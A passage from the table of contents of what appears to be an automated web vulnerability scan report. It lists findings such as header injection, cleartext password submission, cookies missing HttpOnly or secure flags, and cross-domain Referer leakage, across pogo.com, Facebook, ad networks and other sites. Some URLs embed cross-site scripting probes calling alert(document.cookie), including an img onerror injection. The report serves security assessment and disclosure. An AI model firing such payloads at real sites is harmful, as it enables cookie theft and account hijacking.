3.640. http://game3.pogo.com/room/game/frameset.jsp [Referer HTTP header]

3.641. http://game3.pogo.com/room/game/game.jsp [Referer HTTP header]

3.642. http://game3.pogo.com/room/game/gameshell.jsp [Referer HTTP header]

3.643. http://game3.pogo.com/room/loading/init.jsp [Referer HTTP header]

3.644. http://game3.pogo.com/room/loading/jvmtest.jsp [Referer HTTP header]

3.645. http://game3.pogo.com/room/loading/jvmtest.jsp [User-Agent HTTP header]

3.646. http://game3.pogo.com/room/loading/loading.jsp [Referer HTTP header]

3.647. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]

3.648. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]

3.649. http://game3.pogo.com/room/util/urlopen.jsp [Referer HTTP header]

3.650. http://game3.pogo.com/util/client-props.jsp [Referer HTTP header]

3.651. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/ [Referer HTTP header]

3.652. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/ [Referer HTTP header]

3.653. http://puzzle-games.pogo.com/ [Referer HTTP header]

3.654. http://puzzle-games.pogo.com/games/bejeweled2 [Referer HTTP header]

3.655. http://rss.pogo.com/rss [Referer HTTP header]

3.656. http://word-games.pogo.com/ [Referer HTTP header]

3.657. http://word-games.pogo.com/games/scrabble [Referer HTTP header]

3.658. http://word-games.pogo.com/games/scrabble [Referer HTTP header]

3.659. http://www.bbc.co.uk/news/technology-12126880 [Referer HTTP header]

3.660. http://www.gamespot.com/ [Referer HTTP header]

3.661. http://www.pogo.com/ [Referer HTTP header]

3.662. http://www.pogo.com/ [Referer HTTP header]

3.663. http://www.pogo.com/account/my-account.do [Referer HTTP header]

3.664. http://www.pogo.com/account/my-account/confirm-recover-password.do [Referer HTTP header]

3.665. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header]

3.666. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header]

3.667. http://www.pogo.com/account/my-account/main.do [Referer HTTP header]

3.668. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header]

3.669. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header]

3.670. http://www.pogo.com/account/verify-password.do [Referer HTTP header]

3.671. http://www.pogo.com/account/verify-password.do [Referer HTTP header]

3.672. http://www.pogo.com/action/pogo/confirmation.do [Referer HTTP header]

3.673. http://www.pogo.com/action/pogo/createAccount.do [Referer HTTP header]

3.674. http://www.pogo.com/action/pogo/lightreg.do [Referer HTTP header]

3.675. http://www.pogo.com/action/pogo/lightregview.do [Referer HTTP header]

3.676. http://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]

3.677. http://www.pogo.com/all-games [Referer HTTP header]

3.678. http://www.pogo.com/board-games [Referer HTTP header]

3.679. http://www.pogo.com/board-games [Referer HTTP header]

3.680. http://www.pogo.com/games/connect.jsp [Referer HTTP header]

3.681. http://www.pogo.com/home/home.jsp [Referer HTTP header]

3.682. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [Referer HTTP header]

3.683. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [Referer HTTP header]

3.684. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [Referer HTTP header]

3.685. http://www.pogo.com/hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 [Referer HTTP header]

3.686. http://www.pogo.com/img/prize/en_US/cash-giveaway [Referer HTTP header]

3.687. http://www.pogo.com/login/entry.jsp [Referer HTTP header]

3.688. http://www.pogo.com/login/pogo/setCookie.do [Referer HTTP header]

3.689. http://www.pogo.com/login/word-verification.jsp [Referer HTTP header]

3.690. http://www.pogo.com/news/us/latestnews/news-2010.jsp [Referer HTTP header]

3.691. http://www.pogo.com/news/us/netiquette/net-2009.jsp [Referer HTTP header]

3.692. http://www.pogo.com/news/us/winnerscircle/winners-2010.jsp [Referer HTTP header]

3.693. http://www.pogo.com/prize/prize.do [Referer HTTP header]

3.694. http://www.pogo.com/prize/prize.do [Referer HTTP header]

3.695. http://www.pogo.com/prize/rules.do [Referer HTTP header]

3.696. http://www.pogo.com/profiles/k7240 [Referer HTTP header]

3.697. http://www.pogo.com/puzzle-games [Referer HTTP header]

3.698. http://www.pogo.com/puzzle-games [Referer HTTP header]

3.699. http://www.pogo.com/sitemap [Referer HTTP header]

3.700. http://www.pogo.com/word-games [Referer HTTP header]

3.701. http://www.pogo.com/word-games [Referer HTTP header]

3.702. https://www.pogo.com/action/pogo/signin.do [Referer HTTP header]

3.703. https://www.pogo.com/action/pogop/heavyregview.do [Referer HTTP header]

3.704. https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]

3.705. https://www.pogo.com/surveys/processZipSubs.do [Referer HTTP header]

3.706. https://www.pogo.com/surveys/surveysofferssubs.do [Referer HTTP header]

3.707. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

3.708. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

3.709. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie]

3.710. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie]

3.711. http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie]

3.712. http://www.peanutlabs.com/userGreeting.php [pl_lang cookie]

4. Flash cross-domain policy

5. Cleartext submission of password

5.1. http://activity.livefaceonweb.com/

5.2. http://diythemes.com/thesis/

5.3. http://mail.cmsinter.net/Login.aspx

5.4. http://malsup.com/jquery/form/

5.5. http://malsup.com/jquery/form/

5.6. http://malsup.com/jquery/form/

5.7. http://malsup.com/jquery/form/

5.8. http://malsup.com/jquery/form/

5.9. http://malsup.com/jquery/form/

5.10. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

5.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

5.12. http://revver.com/video/426755/peanut-labs/

5.13. http://themeforest.net/user/freshface/portfolio

5.14. http://wordpress.org/extend/plugins/wp-pagenavi/

5.15. http://www.43things.com/person/

5.16. http://www.facebook.com/

5.17. http://www.mlive.com/

5.18. http://www.onestat.com/

5.19. http://www.peanutlabs.com/adminLogin.php

5.20. http://www.pogo.com/

5.21. http://www.pogo.com/account/verify-password.do

5.22. http://www.pogo.com/action/pogo/lightregview.do

5.23. http://www.rockband.com/

5.24. http://www.xanga.com/

6. Session token in URL

6.1. http://www.facebook.com/extern/login_status.php

6.2. http://www.pogo.com/account/my-account/main.do

6.3. http://www.slidedeck.com/

7. Password field submitted using GET method

8. ASP.NET ViewState without MAC enabled

8.1. http://beta-ads.ace.advertising.com/

8.2. http://r1.ace.advertising.com/

9. Cookie scoped to parent domain

9.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

9.2. http://www.43things.com/person/

9.3. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

9.4. http://www.peanutlabs.com/peanutlabs/

9.5. http://www.peanutlabs.com/userGreeting.php

9.6. http://ad.doubleclick.net/click

9.7. http://ad.turn.com/server/pixel.htm

9.8. http://admeld.adnxs.com/usersync

9.9. http://ads.adxpose.com/ads/ads.js

9.10. http://altfarm.mediaplex.com/ad/js/55290

9.11. http://b.scorecardresearch.com/b

9.12. http://b.scorecardresearch.com/p

9.13. http://b.scorecardresearch.com/r

9.14. http://board-games.pogo.com/

9.15. http://board-games.pogo.com/games/monopoly

9.16. http://board-games.pogo.com/games/online-chess

9.17. http://board-games.pogo.com/games/risk

9.18. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

9.19. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

9.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.21. http://card-games.pogo.com/

9.22. http://card-games.pogo.com/games/cribbage

9.23. http://card-games.pogo.com/games/rainy-day-spider-solitaire

9.24. http://click.linksynergy.com/fs-bin/stat

9.25. http://clubpogo-games.pogo.com/

9.26. http://flash-games.pogo.com/

9.27. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

9.28. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

9.29. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js

9.30. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js

9.31. http://puzzle-games.pogo.com/

9.32. http://puzzle-games.pogo.com/games/bejeweled2

9.33. http://puzzle-games.pogo.com/games/yahtzee-party

9.34. http://r.turn.com/server/pixel.htm

9.35. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64

9.36. http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

9.37. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

9.38. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F

9.39. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

9.40. http://www.adobe.com/cfusion/exchange/

9.41. http://www.adobe.com/cfusion/marketplace/index.cfm

9.42. http://www.adobe.com/cfusion/membership/index.cfm

9.43. http://www.adobe.com/cfusion/membership/logout.cfm

9.44. http://www.adobe.com/cfusion/partnerportal/index.cfm

9.45. http://www.adobe.com/cfusion/showcase/index.cfm

9.46. http://www.adobe.com/cfusion/store/html/index.cfm

9.47. http://www.adobe.com/cfusion/support/index.cfm

9.48. http://www.adobe.com/events/main.jsp

9.49. http://www.bbc.co.uk/news/technology-12126880

9.50. http://www.e00.peanutlabs.com/js/iFrame/index.php

9.51. http://www.facebook.com/

9.52. http://www.facebook.com/2008/fbml

9.53. http://www.facebook.com/Pogo

9.54. http://www.facebook.com/campaign/impression.php

9.55. http://www.facebook.com/campaign/landing.php

9.56. http://www.facebook.com/event.php

9.57. http://www.facebook.com/logout.php

9.58. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

9.59. http://www.facebook.com/peanutlabs

9.60. http://www.facebook.com/sitetour/connect.php

9.61. https://www.facebook.com/login.php

9.62. http://www.gamespot.com/

9.63. http://www.peanutlabs.com/core.php

9.64. http://www.peanutlabs.com/pl/profileSurveyRegister.php

9.65. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php

9.66. http://www.pogo.com/action/pogo/lightreg.do

9.67. http://www.pogo.com/games/connect.jsp

9.68. http://www.pogo.com/games/scrabble

9.69. http://www.pogo.com/login/entry.jsp

9.70. http://www.pogo.com/login/pogo/setCookie.do

9.71. https://www.pogo.com/fbconnect/js.do

10. Cookie without HttpOnly flag set

10.1. http://ads.adxpose.com/ads/ads.js

10.2. http://diythemes.com/thesis/

10.3. http://event.adxpose.com/event.flow

10.4. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

10.5. http://www.43things.com/person/

10.6. http://www.adbrite.com/mb/commerce/purchase_form.php

10.7. http://www.adobe.com/cfusion/exchange/

10.8. http://www.adobe.com/cfusion/marketplace/index.cfm

10.9. http://www.adobe.com/cfusion/membership/index.cfm

10.10. http://www.adobe.com/cfusion/membership/logout.cfm

10.11. http://www.adobe.com/cfusion/partnerportal/index.cfm

10.12. http://www.adobe.com/cfusion/showcase/index.cfm

10.13. http://www.adobe.com/cfusion/store/html/index.cfm

10.14. http://www.adobe.com/cfusion/support/index.cfm

10.15. http://www.adobe.com/events/main.jsp

10.16. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

10.17. http://www.peanutlabs.com/peanutlabs/

10.18. http://www.peanutlabs.com/userGreeting.php

10.19. http://www.pixeltrack66.com/mt/w2643334g4y223/

10.20. http://www.thedailynews.cc/

10.21. http://ad.doubleclick.net/click

10.22. http://ad.turn.com/server/pixel.htm

10.23. http://altfarm.mediaplex.com/ad/js/55290

10.24. http://b.scorecardresearch.com/b

10.25. http://b.scorecardresearch.com/p

10.26. http://b.scorecardresearch.com/r

10.27. http://board-games.pogo.com/

10.28. http://board-games.pogo.com/games/monopoly

10.29. http://board-games.pogo.com/games/online-chess

10.30. http://board-games.pogo.com/games/risk

10.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.33. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

10.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.35. http://card-games.pogo.com/

10.36. http://card-games.pogo.com/games/cribbage

10.37. http://card-games.pogo.com/games/rainy-day-spider-solitaire

10.38. http://click.linksynergy.com/fs-bin/stat

10.39. http://clubpogo-games.pogo.com/

10.40. http://flash-games.pogo.com/

10.41. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

10.42. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js

10.43. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js

10.44. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js

10.45. http://puzzle-games.pogo.com/

10.46. http://puzzle-games.pogo.com/games/bejeweled2

10.47. http://puzzle-games.pogo.com/games/yahtzee-party

10.48. http://r.turn.com/server/pixel.htm

10.49. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64

10.50. http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

10.51. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

10.52. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F

10.53. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

10.54. http://www.bbc.co.uk/news/technology-12126880

10.55. http://www.e00.peanutlabs.com/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg

10.56. http://www.e00.peanutlabs.com/favicon.ico

10.57. http://www.e00.peanutlabs.com/js/iFrame/index.php

10.58. http://www.e00.peanutlabs.com/js/images/languages/icon_world.png

10.59. http://www.e00.peanutlabs.com/recvMid.php

10.60. http://www.ea.com/

10.61. http://www.ea.com/hasbro

10.62. http://www.ea.com/ipad

10.63. http://www.ea.com/iphone

10.64. http://www.ea.com/mobile

10.65. http://www.ea.com/platform/online-games

10.66. http://www.ea.com/platform/pc-games

10.67. http://www.ea.com/platform/ps3-games

10.68. http://www.ea.com/platform/xbox-360-games

10.69. http://www.ea.com/wii

10.70. http://www.facebook.com/

10.71. http://www.facebook.com/2008/fbml

10.72. http://www.facebook.com/Pogo

10.73. http://www.facebook.com/event.php

10.74. http://www.facebook.com/logout.php

10.75. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

10.76. http://www.facebook.com/peanutlabs

10.77. http://www.facebook.com/sitetour/connect.php

10.78. https://www.facebook.com/login.php

10.79. http://www.gamespot.com/

10.80. http://www.intellicast.com/

10.81. http://www.intellicast.com/Local/Weather.aspx

10.82. http://www.intellicast.com/Travel/CheapFlightsWidget.htm

10.83. http://www.intellicast.com/favicon.ico

10.84. http://www.peanutlabs.com/core.php

10.85. http://www.peanutlabs.com/pl/profileSurveyRegister.php

10.86. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php

10.87. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409

10.88. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409

10.89. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=

10.90. http://www.pogo.com/action/pogo/lightreg.do

10.91. http://www.pogo.com/games/connect.jsp

10.92. http://www.pogo.com/games/scrabble

10.93. http://www.pogo.com/login/entry.jsp

10.94. http://www.pogo.com/login/pogo/setCookie.do

10.95. https://www.pogo.com/fbconnect/js.do

10.96. http://www.rockband.com/

10.97. http://www.xanga.com/

11. Password field with autocomplete enabled

11.1. http://activity.livefaceonweb.com/

11.2. http://diythemes.com/thesis/

11.3. http://mail.cmsinter.net/Login.aspx

11.4. http://mail.cmsinter.net/Login.aspx

11.5. http://malsup.com/jquery/form/

11.6. http://malsup.com/jquery/form/

11.7. http://malsup.com/jquery/form/

11.8. http://malsup.com/jquery/form/

11.9. http://malsup.com/jquery/form/

11.10. http://malsup.com/jquery/form/

11.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

11.12. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

11.13. http://themeforest.net/user/freshface/portfolio

11.14. http://wordpress.org/extend/plugins/wp-pagenavi/

11.15. http://www.43things.com/person/

11.16. http://www.adbrite.com/mb/commerce/purchase_form.php

11.17. http://www.adbrite.com/mb/commerce/purchase_form.php

11.18. http://www.facebook.com/

11.19. http://www.facebook.com/

11.20. http://www.facebook.com/

11.21. http://www.facebook.com/2008/fbml

11.22. http://www.facebook.com/Pogo

11.23. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

11.24. http://www.facebook.com/peanutlabs

11.25. https://www.facebook.com/connect/uiserver.php

11.26. https://www.facebook.com/login.php

11.27. http://www.gamespot.com/

11.28. http://www.mlive.com/

11.29. http://www.onestat.com/

11.30. http://www.pandora.com/login.vm

11.31. http://www.pandora.com/people/

11.32. http://www.peanutlabs.com/adminLogin.php

11.33. http://www.pogo.com/

11.34. http://www.pogo.com/account/verify-password.do

11.35. http://www.pogo.com/action/pogo/lightregview.do

11.36. https://www.pogo.com/action/pogo/signin.do

11.37. http://www.rockband.com/

11.38. http://www.weather.com/

11.39. http://www.weather.com/weather/local/48617

11.40. http://www.weather.com/weather/local/48858

11.41. http://www.weather.com/weather/local/48879

11.42. http://www.weather.com/weather/local/USMI0020

11.43. http://www.xanga.com/

12. Source code disclosure

13. Referer-dependent response

13.1. http://www.facebook.com/extern/login_status.php

13.2. http://www.facebook.com/plugins/activity.php

13.3. http://www.facebook.com/plugins/like.php

13.4. https://www.pogo.com/action/pogop/welcome.do

14. Cross-domain POST

14.1. http://blog.pandora.com/pandora/archives/2007/07/

14.2. http://diythemes.com/thesis/

14.3. http://themeforest.net/user/freshface/portfolio

14.4. http://www.cmsinter.net/

14.5. http://www.pandora.com/static/ads/media-kit/advertising.html

15. SSL cookie without secure flag set

15.1. https://www.facebook.com/login.php

15.2. https://www.pogo.com/fbconnect/js.do

16. Cross-domain Referer leakage

16.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2

16.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105

16.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98

16.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

16.5. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

16.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

16.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13

16.8. http://ad.doubleclick.net/adj/home.pogo/spotlight

16.9. http://ad.doubleclick.net/adj/home.pogo/spotlight

16.10. http://ad.doubleclick.net/adj/ic.us.wx/fcst

16.11. http://ad.doubleclick.net/adj/pand.default/prod.backstage

16.12. http://admeld.adnxs.com/usersync

16.13. http://ads.bluelithium.com/st

16.14. http://board-games.pogo.com/games/monopoly

16.15. http://download-games.pogo.com/

16.16. http://download-games.pogo.com/

16.17. http://download-games.pogo.com/AllGames.aspx

16.18. http://download-games.pogo.com/AllGames.aspx

16.19. http://download-games.pogo.com/Category.aspx

16.20. http://download-games.pogo.com/Category.aspx

16.21. http://download-games.pogo.com/deluxe.aspx

16.22. http://download-games.pogo.com/deluxe.aspx

16.23. http://download-games.pogo.com/deluxe.aspx

16.24. http://download-games.pogo.com/downloads.aspx

16.25. http://game3.pogo.com/error/java-problem.jsp

16.26. http://game3.pogo.com/exhibit/game/game.jsp

16.27. http://game3.pogo.com/exhibit/intermission.jsp

16.28. http://game3.pogo.com/exhibit/loading/loading.jsp

16.29. http://game3.pogo.com/exhibit/loading/loading.jsp

16.30. http://jqueryui.com/themeroller/

16.31. http://word-games.pogo.com/

16.32. http://word-games.pogo.com/games/scrabble

16.33. http://www.adbrite.com/mb/commerce/purchase_form.php

16.34. http://www.adobe.com/cfusion/marketplace/index.cfm

16.35. http://www.cmsinter.net/

16.36. http://www.cmsinter.net/

16.37. http://www.cmsinter.net/blog/

16.38. http://www.e00.peanutlabs.com/js/iFrame/sc.php

16.39. http://www.facebook.com/

16.40. http://www.facebook.com/Pogo

16.41. http://www.facebook.com/plugins/activity.php

16.42. http://www.facebook.com/plugins/facepile.php

16.43. http://www.facebook.com/plugins/like.php

16.44. http://www.intellicast.com/Local/Weather.aspx

16.45. http://www.pandora.com/

16.46. http://www.pandora.com/login.vm

16.47. http://www.peanutlabs.com/js/iFrame/sc.php

16.48. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php

16.49. http://www.pogo.com/

16.50. http://www.pogo.com/

16.51. http://www.pogo.com/all-games

16.52. http://www.pogo.com/arcade-sports-games

16.53. http://www.pogo.com/board-games

16.54. http://www.pogo.com/club-pogo

16.55. http://www.pogo.com/games/scrabble

16.56. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.57. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.58. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.59. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.60. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.61. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

16.62. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

16.63. http://www.pogo.com/misc/advertise.jsp

16.64. http://www.pogo.com/oberon/navheader.jsp

16.65. http://www.pogo.com/oberon/navheader.jsp

16.66. http://www.pogo.com/prize/prize.do

16.67. http://www.pogo.com/sitemap

16.68. http://www.pogo.com/word-games

16.69. https://www.pogo.com/action/pogo/signin.do

16.70. https://www.pogo.com/action/pogo/signin.do

16.71. https://www.pogo.com/action/pogo/signin.do

16.72. https://www.pogo.com/action/pogo/signin.do

16.73. https://www.pogo.com/action/pogo/signin.do

16.74. https://www.pogo.com/action/pogo/signin.do

16.75. https://www.pogo.com/action/pogo/signin.do

16.76. https://www.pogo.com/action/pogo/signin.do

16.77. https://www.pogo.com/action/pogo/signin.do

16.78. https://www.pogo.com/action/pogo/signin.do

16.79. https://www.pogo.com/action/pogo/signin.do

16.80. https://www.pogo.com/action/pogo/signin.do

16.81. https://www.pogo.com/action/pogo/signin.do

16.82. https://www.pogo.com/surveys/surveysofferssubs.do

16.83. http://www.slidedeck.com/

17. Cross-domain script include

17.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2

17.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105

17.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98

17.4. http://blog.pandora.com/faq/

17.5. http://blog.pandora.com/pandora/

17.6. http://blog.pandora.com/pandora/archives/arizona/

17.7. http://blog.pandora.com/pandora/archives/california/

17.8. http://blog.pandora.com/pandora/archives/colorado/

17.9. http://blog.pandora.com/pandora/archives/florida/

17.10. http://blog.pandora.com/pandora/archives/georgia/

17.11. http://blog.pandora.com/pandora/archives/illinois/

17.12. http://blog.pandora.com/pandora/archives/indiana/

17.13. http://blog.pandora.com/pandora/archives/louisiana/

17.14. http://blog.pandora.com/pandora/archives/maine/

17.15. http://blog.pandora.com/pandora/archives/maryland/

17.16. http://blog.pandora.com/pandora/archives/massachusetts/

17.17. http://blog.pandora.com/pandora/archives/michigan/

17.18. http://blog.pandora.com/pandora/archives/minnesota/

17.19. http://blog.pandora.com/pandora/archives/mississippi/

17.20. http://blog.pandora.com/pandora/archives/missouri/

17.21. http://blog.pandora.com/pandora/archives/nebraska/

17.22. http://blog.pandora.com/pandora/archives/new-jersey/

17.23. http://blog.pandora.com/pandora/archives/new-york/

17.24. http://blog.pandora.com/pandora/archives/north-carolina/

17.25. http://blog.pandora.com/pandora/archives/north-dakota/

17.26. http://blog.pandora.com/pandora/archives/ohio/

17.27. http://blog.pandora.com/pandora/archives/oregon/

17.28. http://blog.pandora.com/pandora/archives/other-states/

17.29. http://blog.pandora.com/pandora/archives/other_states/index.html

17.30. http://blog.pandora.com/pandora/archives/pennsylvania/

17.31. http://blog.pandora.com/pandora/archives/play-listen-repeat/

17.32. http://blog.pandora.com/pandora/archives/rhode-island/

17.33. http://blog.pandora.com/pandora/archives/roadtrip/

17.34. http://blog.pandora.com/pandora/archives/roadtrip/index.html

17.35. http://blog.pandora.com/pandora/archives/south-daktoa/

17.36. http://blog.pandora.com/pandora/archives/tennessee/

17.37. http://blog.pandora.com/pandora/archives/texas/

17.38. http://blog.pandora.com/pandora/archives/utah/

17.39. http://blog.pandora.com/pandora/archives/virginia/

17.40. http://blog.pandora.com/pandora/archives/washington-dc/

17.41. http://blog.pandora.com/pandora/archives/washington/

17.42. http://board-games.pogo.com/games/monopoly

17.43. http://dean.edwards.name/weblog/2006/06/again/

17.44. http://diythemes.com/thesis/

17.45. http://game3.pogo.com/error/java-problem.jsp

17.46. http://game3.pogo.com/exhibit/game/game.jsp

17.47. http://game3.pogo.com/exhibit/intermission.jsp

17.48. http://game3.pogo.com/exhibit/loading/loading.jsp

17.49. http://game3.pogo.com/exhibit/loading/loading.jsp

17.50. http://jqueryui.com/about

17.51. http://jqueryui.com/themeroller/

17.52. http://malsup.com/jquery/form/

17.53. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

17.54. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

17.55. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

17.56. http://revver.com/video/426755/peanut-labs/

17.57. http://themeforest.net/user/freshface/portfolio

17.58. http://word-games.pogo.com/

17.59. http://wordpress.org/extend/plugins/wp-pagenavi/

17.60. http://www.adobe.com/special/offers.html

17.61. http://www.adobe.com/training/

17.62. http://www.bbc.co.uk/news/technology-12126880

17.63. http://www.e00.peanutlabs.com/js/iFrame/sc.php

17.64. http://www.ea.com/

17.65. http://www.ea.com/hasbro

17.66. http://www.ea.com/ipad

17.67. http://www.ea.com/iphone

17.68. http://www.ea.com/mobile

17.69. http://www.ea.com/platform/online-games

17.70. http://www.ea.com/platform/pc-games

17.71. http://www.ea.com/platform/ps3-games

17.72. http://www.ea.com/platform/xbox-360-games

17.73. http://www.ea.com/wii

17.74. http://www.facebook.com/

17.75. http://www.facebook.com/2008/fbml

17.76. http://www.facebook.com/Pogo

17.77. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817

17.78. http://www.facebook.com/peanutlabs

17.79. http://www.facebook.com/plugins/activity.php

17.80. http://www.facebook.com/plugins/activity.php

17.81. http://www.facebook.com/plugins/facepile.php

17.82. http://www.facebook.com/plugins/like.php

17.83. http://www.facebook.com/plugins/like.php

17.84. http://www.facebook.com/xd_receiver_v0.4.php

17.85. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

17.86. http://www.freshnews.com/news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/a

17.87. http://www.gamespot.com/

17.88. http://www.intellicast.com/

17.89. http://www.intellicast.com/Local/Weather.aspx

17.90. http://www.mlive.com/

